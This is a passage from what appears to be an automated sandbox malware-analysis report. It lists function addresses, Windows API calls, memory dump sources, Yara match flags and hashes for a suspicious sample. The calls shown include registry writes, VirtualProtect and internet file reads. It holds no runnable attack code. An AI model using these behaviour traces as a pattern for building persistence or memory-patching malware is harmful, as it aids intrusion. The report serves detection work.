                                          • Opcode Fuzzy Hash: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                          • Instruction Fuzzy Hash: 610124379083A66EF25BC7B49CC964B379AEB0D3F53208329F114410F8EFA29E45A244
                                          APIs
                                          • GetLastError.KERNEL32(?,?,0040B97B,0040AF1F,0040A730), ref: 0040B992
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040B9A0
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040B9B9
                                          • SetLastError.KERNEL32(00000000,0040B97B,0040AF1F,0040A730), ref: 0040BA0B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                          • Instruction ID: c1383cefff0a9c77c0f6256a7d22d0577fd0bc713188e5814d490c4ea7085b9f
                                          • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                          • Instruction Fuzzy Hash: 6D0192727197119EE63427B97CC6A6B2B94EB01778760033BF520752E2EB39480255CC
                                          APIs
                                          • std::_Xinvalid_argument.LIBCPMT ref: 004015D5
                                            • Part of subcall function 00409842: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0040984E
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,12041A13,00000000,00000000,?,?,0042D884,?,?,?,0042DAF4), ref: 0040160B
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,12041A13,00000000,?,0042D884,?,?,?,0042DAF4), ref: 00401642
                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00401757
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                          • String ID: string too long
                                          • API String ID: 2123813255-2556327735
                                          • Opcode ID: d5f1c80286caa7e1e042afc540da997b8870432c30c507321fa7703b5c3a7ad2
                                          • Instruction ID: 8b29ff92f67febe7d184f40cd986ab90276924f3587203b15f4be4e0e60d2281
                                          • Opcode Fuzzy Hash: d5f1c80286caa7e1e042afc540da997b8870432c30c507321fa7703b5c3a7ad2
                                          • Instruction Fuzzy Hash: 5E4127B1A00300ABD720AF759C8575BB7B8EF48354F24063AF91AE73D1E775AD0487A9
                                          APIs
                                          • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405903
                                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405925
                                          • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040594D
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405956
                                          • Sleep.KERNEL32(000005DC), ref: 00405A90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CloseCreateOpenSleepValue
                                          • String ID: mixone
                                          • API String ID: 4111408922-3123478411
                                          • Opcode ID: 5956f32b293078b1f23111287794b54aa008f1a70d72d9563616efc3db9a2cf7
                                          • Instruction ID: 36deb0a2def4af7d69c3889f60f670a394a8a5da25757ff3a02b89eea185ed5b
                                          • Opcode Fuzzy Hash: 5956f32b293078b1f23111287794b54aa008f1a70d72d9563616efc3db9a2cf7
                                          • Instruction Fuzzy Hash: F3418571210108AFEB08DF58DC95BEE7B65EF08300F908229F955AB5D1D778E9848F58
                                          APIs
                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,F6E2F767,0040280B,?,00000000,0041DA7B,000000FF,?,0041055C,08758BC2,?,00410530,00000016), ref: 004105B5
                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004105C7
                                          • FreeLibrary.KERNEL32(00000000,?,00000000,0041DA7B,000000FF,?,0041055C,08758BC2,?,00410530,00000016), ref: 004105E9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: AddressFreeHandleLibraryModuleProc
                                          • String ID: CorExitProcess$mscoree.dll
                                          • API String ID: 4061214504-1276376045
                                          • Opcode ID: d9f390a0c8d24d43879d0675fee7d7aa557a7bdfd7840f409546c87a96f2ba59
                                          • Instruction ID: f4dd53f2cc94282f557b0741292325b7031a84366b21a1c3c136dd1e19965a8c
                                          • Opcode Fuzzy Hash: d9f390a0c8d24d43879d0675fee7d7aa557a7bdfd7840f409546c87a96f2ba59
                                          • Instruction Fuzzy Hash: F501A271A44625FBDB128F80DC05BEEBBB9FB04B51F004536F811A22A0DBB8A944CB58
                                          APIs
                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FBF
                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10005FD2
                                          • FreeLibrary.KERNEL32(00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FF5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2612219452.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2612202169.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612243212.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612263548.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                          Similarity
                                          • API ID: AddressFreeHandleLibraryModuleProc
                                          • String ID: CorExitProcess$mscoree.dll
                                          • API String ID: 4061214504-1276376045
                                          • Opcode ID: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                          • Instruction ID: ce5d81a5a20928f213bfffb098e7a6005668583a74e8757c7f390ca8b74bdc84
                                          • Opcode Fuzzy Hash: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                          • Instruction Fuzzy Hash: 1BF01C31904129FBEB06DB91CD0ABEE7AB9EB047D6F1041B4F501A21A4CBB5CE41DB90
                                          APIs
                                          • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,1000A899,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 1000A680
                                          • __alloca_probe_16.LIBCMT ref: 1000A736
                                          • __alloca_probe_16.LIBCMT ref: 1000A7CC
                                          • __freea.LIBCMT ref: 1000A837
                                          • __freea.LIBCMT ref: 1000A843
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2612219452.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2612202169.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612243212.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612263548.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                          Similarity
                                          • API ID: __alloca_probe_16__freea$Info
                                          • String ID:
                                          • API String ID: 2330168043-0
                                          • Opcode ID: 6801c7cf1a2c1c6b356f2cb05e88654cbb9424f85dc0dbbe55d1f090f9a52ad6
                                          • Instruction ID: 1dd90d70d9504398cfa9d6ef4ea6864651e072268de8b4bf5549d7cf43e308ef
                                          • Opcode Fuzzy Hash: 6801c7cf1a2c1c6b356f2cb05e88654cbb9424f85dc0dbbe55d1f090f9a52ad6
                                          • Instruction Fuzzy Hash: C081A472D042569BFF11CE648C81ADE7BF5EF0B6D0F158265E904AB148DB369DC1CBA0
                                          APIs
                                          • __alloca_probe_16.LIBCMT ref: 1000B03B
                                          • __alloca_probe_16.LIBCMT ref: 1000B101
                                          • __freea.LIBCMT ref: 1000B16D
                                            • Part of subcall function 100079EE: RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                          • __freea.LIBCMT ref: 1000B176
                                          • __freea.LIBCMT ref: 1000B199
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2612219452.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2612202169.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612243212.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612263548.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                          Similarity
                                          • API ID: __freea$__alloca_probe_16$AllocateHeap
                                          • String ID:
                                          • API String ID: 1423051803-0
                                          • Opcode ID: 08a43eba5b954a3f04cd68b018e4776cfa43d2eee8ce0c2eced5adaaebccb1f4
                                          • Instruction ID: ca0e6193c5ab93552cef367aef9b2c098b98f9a761b18089088d519bce5e91c7
                                          • Opcode Fuzzy Hash: 08a43eba5b954a3f04cd68b018e4776cfa43d2eee8ce0c2eced5adaaebccb1f4
                                          • Instruction Fuzzy Hash: 6651C072600616ABFB21CF64CC81EAF37E9EF456D0F624129FD14A7158EB34EC5197A0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000003.1947099269.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                          Similarity
                                          • API ID: __freea$__alloca_probe_16
                                          • String ID:
                                          • API String ID: 3509577899-0
                                          • Opcode ID: c409ed0a73a31f3b78c849091ec1d6b89a85a3ccc37d0e928c6a0ebb1540a73b
                                          • Instruction ID: ec9159dd719152ee56e081e5dbcf39efff09a47483e4cec4d898f1dfc61a800f
                                          • Opcode Fuzzy Hash: c409ed0a73a31f3b78c849091ec1d6b89a85a3ccc37d0e928c6a0ebb1540a73b
                                          • Instruction Fuzzy Hash: DC51C172700246BFFB219F60AC88EBB7AA9FF44754B150129FE06E7160EA70ED50C670
                                          APIs
                                          • __alloca_probe_16.LIBCMT ref: 00415095
                                          • __alloca_probe_16.LIBCMT ref: 0041515E
                                          • __freea.LIBCMT ref: 004151C5
                                            • Part of subcall function 00413C79: RtlAllocateHeap.NTDLL(00000000,00402809,00402805,?,0040AD1B,0040280B,00402805,0042D884,?,?,00403597,?,00402809,00402805), ref: 00413CAB
                                          • __freea.LIBCMT ref: 004151D8
                                          • __freea.LIBCMT ref: 004151E5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: __freea$__alloca_probe_16$AllocateHeap
                                          • String ID:
                                          • API String ID: 1423051803-0
                                          • Opcode ID: c0223aac213706da923d74aec6f81ab2cdbbbf03147a9c613dee044af7b571ef
                                          • Instruction ID: def92c4ecd74f4627ee81fabb5ad5435351d3551a42f570b1979e48308b83863
                                          • Opcode Fuzzy Hash: c0223aac213706da923d74aec6f81ab2cdbbbf03147a9c613dee044af7b571ef
                                          • Instruction Fuzzy Hash: 1A51B372A00646FFDB225FA1CC41FFB3AA9EF84754B25002FFD04D6251EA39CD918668
                                          APIs
                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 04B42D2F
                                          • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 04B42D44
                                          • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 04B42D52
                                          • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 04B42D6D
                                          • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 04B42D8C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                                          • String ID:
                                          • API String ID: 2509773233-0
                                          • Opcode ID: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                                          • Instruction ID: 8e18de661923d82d6020273abfcec6f97db7c164ec7190948dbc976ba605cdfd
                                          • Opcode Fuzzy Hash: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                                          • Instruction Fuzzy Hash: F9312635B00104AFDB14DF68DC40FAAB7A9EF88340F4541E9FA05EB252DB71AD16EB94
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2612219452.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2612202169.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612243212.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612263548.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                          Similarity
                                          • API ID: dllmain_raw$dllmain_crt_dispatch
                                          • String ID:
                                          • API String ID: 3136044242-0
                                          • Opcode ID: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                          • Instruction ID: 86b98bd5048e9daedf5606c3f96c4c2c05ee8e367bee4de8e4e1682ebb6c2564
                                          • Opcode Fuzzy Hash: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                          • Instruction Fuzzy Hash: EA21A476E0526AAFFB32CF55CC41ABF3AA9EB85AD0F014115FC4867258CB309D419BD1
                                          APIs
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0040CA48,00000000,?,0042D0F8,?,?,?,0040CBEB,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx), ref: 0040CAA4
                                          • GetLastError.KERNEL32(?,0040CA48,00000000,?,0042D0F8,?,?,?,0040CBEB,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx,00000000,?,0040C836), ref: 0040CAAE
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0040CAD6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: LibraryLoad$ErrorLast
                                          • String ID: api-ms-
                                          • API String ID: 3177248105-2084034818
                                          • Opcode ID: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                                          • Instruction ID: aef67c255cc06d75e4f2c7ed4f9f6bc06eb467b970858842cb7b754112db4c8a
                                          • Opcode Fuzzy Hash: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                                          • Instruction Fuzzy Hash: 12E01230380308F6EF105F61ED46B5A3F569B11B54F108131F90DF85E1D7B5A815998C
                                          APIs
                                          • GetConsoleOutputCP.KERNEL32(0042C014,00000000,00000000,00000000), ref: 04B59956
                                            • Part of subcall function 04B551BF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04B55422,?,00000000,-00000008), ref: 04B55220
                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 04B59BA8
                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04B59BEE
                                          • GetLastError.KERNEL32 ref: 04B59C91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                          • String ID:
                                          • API String ID: 2112829910-0
                                          • Opcode ID: da9c2254c3d6feb7781c277c4017dde1248fb7d9dc01eb7e01956cc2f511bebb
                                          • Instruction ID: 84647a73c34bfd62050005a0d5f06d9fcda7076767d6146517fb0533d11def66
                                          • Opcode Fuzzy Hash: da9c2254c3d6feb7781c277c4017dde1248fb7d9dc01eb7e01956cc2f511bebb
                                          • Instruction Fuzzy Hash: 04D15BB5E00248DFDB15CFA8D880AADFBF5FF49314F1445AAE856EB261D630A942CB50
                                          APIs
                                          • GetConsoleOutputCP.KERNEL32(F6E2F767,00000000,00000000,00000000), ref: 004196EF
                                            • Part of subcall function 00414F58: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151BB,?,00000000,-00000008), ref: 00414FB9
                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00419941
                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00419987
                                          • GetLastError.KERNEL32 ref: 00419A2A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                          • String ID:
                                          • API String ID: 2112829910-0
                                          • Opcode ID: 7b6b5b0f837ac57406110df98857d0f42911bc00a2c7897a29ebb1bace7e2d44
                                          • Instruction ID: 80e927e20e1d5b3063f5f9ef1e9119d7a86b1541eeacf5ee68ba8f7951c90f01
                                          • Opcode Fuzzy Hash: 7b6b5b0f837ac57406110df98857d0f42911bc00a2c7897a29ebb1bace7e2d44
                                          • Instruction Fuzzy Hash: 8CD18DB5E002489FCF15CFA8C8909EEBBB5FF49314F28412AE456EB351D634AD86CB54
                                          APIs
                                          • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04B41C3C
                                          • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04B41C5F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileInternet$PointerRead
                                          • String ID:
                                          • API String ID: 3197321146-0
                                          • Opcode ID: 1885a8dfee8479765fa90636c8dddbf3c0bf84813e2bd3c7ed7779aacb4cd4c8
                                          • Instruction ID: fe9c859a85070c4e5a0fce2b30a44a13ac0c1e1ce16a937690a382ae93218c3e
                                          • Opcode Fuzzy Hash: 1885a8dfee8479765fa90636c8dddbf3c0bf84813e2bd3c7ed7779aacb4cd4c8
                                          • Instruction Fuzzy Hash: 86C13BB09002289FEB25DF68CC88BE9B7B4EF89304F1041D9E509A7290D775BE95DF91
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AdjustPointer
                                          • String ID:
                                          • API String ID: 1740715915-0
                                          • Opcode ID: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                          • Instruction ID: aca62ffba26541bc8ed0b1de1d27676f7c4dfef6b63370a4a98d8cf07c7e6eac
                                          • Opcode Fuzzy Hash: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                          • Instruction Fuzzy Hash: 7351C072648202AFEF298F54D840BBA77A4EFC4314F1448E9EA415B690E731F950F790
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000003.1947099269.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                          Similarity
                                          • API ID: AdjustPointer
                                          • String ID:
                                          • API String ID: 1740715915-0
                                          • Opcode ID: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                          • Instruction ID: 755a7699ecabb4809121f894f986286a0dee8b284502aa13d34702f41478052f
                                          • Opcode Fuzzy Hash: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                          • Instruction Fuzzy Hash: E5518CB2701706AFEB299E50D840B6ABBA4FF20714F14C52AE845873D0E771F881C7A0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2612219452.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2612202169.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612243212.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612263548.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                          Similarity
                                          • API ID: AdjustPointer
                                          • String ID:
                                          • API String ID: 1740715915-0
                                          • Opcode ID: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                          • Instruction ID: 9e97f9b43940e94c385e873cf65d718b9a08959cb0185780d8acf6a52a646172
                                          • Opcode Fuzzy Hash: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                          • Instruction Fuzzy Hash: 9D51BFB6A04202AFFB16CF11D941BAB77A8EF047D0F11856DEA05A72A9DB31EC40D794
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: AdjustPointer
                                          • String ID:
                                          • API String ID: 1740715915-0
                                          • Opcode ID: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                          • Instruction ID: c3f9129e04d39096db86ee3dbd798fa579d010b72ca6babdac1055268f0b1971
                                          • Opcode Fuzzy Hash: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                          • Instruction Fuzzy Hash: F651A972600306ABEB298F11C881BAA77B4EF40714F14413FE802A76D5E739AC91CBDD
                                          APIs
                                          • std::_Xinvalid_argument.LIBCPMT ref: 04B4183C
                                            • Part of subcall function 04B49AA9: std::invalid_argument::invalid_argument.LIBCONCRT ref: 04B49AB5
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,12041A13,00000000,00000000,?,?,0042D884,?,?,?,0042DAF4), ref: 04B41872
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,12041A13,00000000,?,0042D884,?,?,?,0042DAF4), ref: 04B418A9
                                          • Concurrency::cancel_current_task.LIBCPMT ref: 04B419BE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                          • String ID:
                                          • API String ID: 2123813255-0
                                          • Opcode ID: 76bb2ae1955411a23ec2113ce7c3df1698fa8cdaa81397e4e46f03e77a8728ac
                                          • Instruction ID: 95048d8a272e7c1841f4d2f2ceb23c41c74cd672a552cc7c56e6b6ee9d50460a
                                          • Opcode Fuzzy Hash: 76bb2ae1955411a23ec2113ce7c3df1698fa8cdaa81397e4e46f03e77a8728ac
                                          • Instruction Fuzzy Hash: FC410CB1E00304ABE7149FB89C8876AB7F8EFC8214F1006A9E95AD7280E771BD45D791
                                          APIs
                                            • Part of subcall function 10008DC4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,1000B163,?,00000000,00000000), ref: 10008E70
                                          • GetLastError.KERNEL32 ref: 10007C36
                                          • __dosmaperr.LIBCMT ref: 10007C3D
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10007C7C
                                          • __dosmaperr.LIBCMT ref: 10007C83
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2612219452.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2612202169.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612243212.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612263548.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 1913693674-0
                                          • Opcode ID: c5759a61a7976f34472f3230490c401b0bdcfc1ff84e849ca2e690b48099d67c
                                          • Instruction ID: 4d86bd2ae757562d8160192595c5732c56f34f1228d97d68919d00ee2a874974
                                          • Opcode Fuzzy Hash: c5759a61a7976f34472f3230490c401b0bdcfc1ff84e849ca2e690b48099d67c
                                          • Instruction Fuzzy Hash: 9021AC75A00216AFB720DF658C85D5BB7ADFF042E4B108529FA699724ADB35EC408BA0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2612219452.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2612202169.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612243212.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612263548.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7fde20d58f3e1108cd5a86cb085c551b539ad6d33639cd9718ad33b154971d06
                                          • Instruction ID: d1df9cd49d1a9d965a935ddcfcfd3b9185eaf4079d6f623355f3cc1fa6217373
                                          • Opcode Fuzzy Hash: 7fde20d58f3e1108cd5a86cb085c551b539ad6d33639cd9718ad33b154971d06
                                          • Instruction Fuzzy Hash: C821D075A00206BFF710DF61CC8090B779CFF846E47108124FA949215AEB31EF0087A0
                                          APIs
                                            • Part of subcall function 04B551BF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04B55422,?,00000000,-00000008), ref: 04B55220
                                          • GetLastError.KERNEL32 ref: 04B5776F
                                          • __dosmaperr.LIBCMT ref: 04B57776
                                          • GetLastError.KERNEL32(?,?,?,?), ref: 04B577B0
                                          • __dosmaperr.LIBCMT ref: 04B577B7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 1913693674-0
                                          • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                          • Instruction ID: d8c3a17e880bfbfd7469b2d85f0699a11be478a4650e971180f6637de2de163c
                                          • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                          • Instruction Fuzzy Hash: C9219571700215AFAB10AF65DC84A6BF7ACFF48268F0085A8ED2997260EB30FC019750
                                          APIs
